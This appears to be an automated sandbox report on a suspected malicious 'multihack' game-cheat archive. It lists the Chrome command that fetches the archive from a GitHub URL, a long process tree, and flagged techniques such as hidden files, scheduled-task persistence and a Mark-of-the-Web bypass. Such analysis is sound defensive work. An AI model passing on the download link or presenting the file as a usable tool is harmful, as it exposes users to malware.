PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 1656	5820	chrome.exe	80
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81
PID 5820 wrote to memory of 5644	5820	chrome.exe	81

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

Hidden Files and Directories

T1564.001

pid	Process
4140	attrib.exe
5256	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/doodoofart3443/ZM-ULTI/raw/refs/heads/main/Ultima%20Multihack%20V3.55.rar
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd10
  2⤵
  PID:224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1416,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2012 /prefetch:11
  2⤵
  PID:2276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1984,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1980 /prefetch:2
  2⤵
  PID:1656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2356,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2368 /prefetch:13
  2⤵
  PID:5644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3228 /prefetch:1
  2⤵
  PID:1196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3284 /prefetch:1
  2⤵
  PID:5300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4156,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3764 /prefetch:9
  2⤵
  PID:4840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5328,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5340 /prefetch:14
  2⤵
  - NTFS ADS
  PID:5000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5384,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5396 /prefetch:14
  2⤵
  PID:1948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5772,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5860 /prefetch:1
  2⤵
  PID:3792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5796,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5624 /prefetch:1
  2⤵
  PID:3464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=212,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3300 /prefetch:14
  2⤵
  PID:2772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3452,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3444 /prefetch:14
  2⤵
  PID:5652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3288,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6008 /prefetch:14
  2⤵
  PID:5840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4152,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4784 /prefetch:1
  2⤵
  PID:3164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3232,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:3124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5432,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:4496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3404,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6028 /prefetch:1
  2⤵
  PID:920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4200,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4220 /prefetch:14
  2⤵
  PID:3396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5228,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5448 /prefetch:12
  2⤵
  PID:3772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6212,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6220 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5460,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6180 /prefetch:1
  2⤵
  PID:4432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6420,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6436 /prefetch:1
  2⤵
  PID:2764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6604,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6644 /prefetch:1
  2⤵
  PID:4148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=3380,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:5448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5804,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3368 /prefetch:1
  2⤵
  PID:5400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=6520,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6484 /prefetch:1
  2⤵
  PID:1936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=4276,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4252 /prefetch:1
  2⤵
  PID:3252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3372,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6136 /prefetch:14
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=4784,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5872 /prefetch:1
  2⤵
  PID:6100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=7008,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7028 /prefetch:1
  2⤵
  PID:952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=6880,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6932 /prefetch:1
  2⤵
  PID:5276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=7268,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7256 /prefetch:1
  2⤵
  PID:720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=7324,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7440 /prefetch:1
  2⤵
  PID:3700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=7608,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6936 /prefetch:1
  2⤵
  PID:4340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=7724,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7760 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=7904,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7924 /prefetch:1
  2⤵
  PID:3972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=8048,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8060 /prefetch:1
  2⤵
  PID:388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=8284,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8272 /prefetch:1
  2⤵
  PID:3424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=8224,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8316 /prefetch:1
  2⤵
  PID:556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=7720,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8056 /prefetch:1
  2⤵
  PID:4300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=8352,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6140 /prefetch:1
  2⤵
  PID:5248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=8528,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8344 /prefetch:1
  2⤵
  PID:2444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=8016,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=6052 /prefetch:1
  2⤵
  PID:2396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=7992,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=7588 /prefetch:1
  2⤵
  PID:3444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=8492,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8092 /prefetch:14
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:3792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7956,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8200 /prefetch:14
  2⤵
  PID:4352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=7692,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8356 /prefetch:14
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  PID:1264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=8012,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8732 /prefetch:10
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4796,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4544 /prefetch:14
  2⤵
  PID:2636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=8860,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8832 /prefetch:1
  2⤵
  PID:6000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=8776,i,17870277369397105070,10682935906485023102,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=8920 /prefetch:1
  2⤵
  PID:5272

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4356

C:\Windows\System32\rundll32.exe
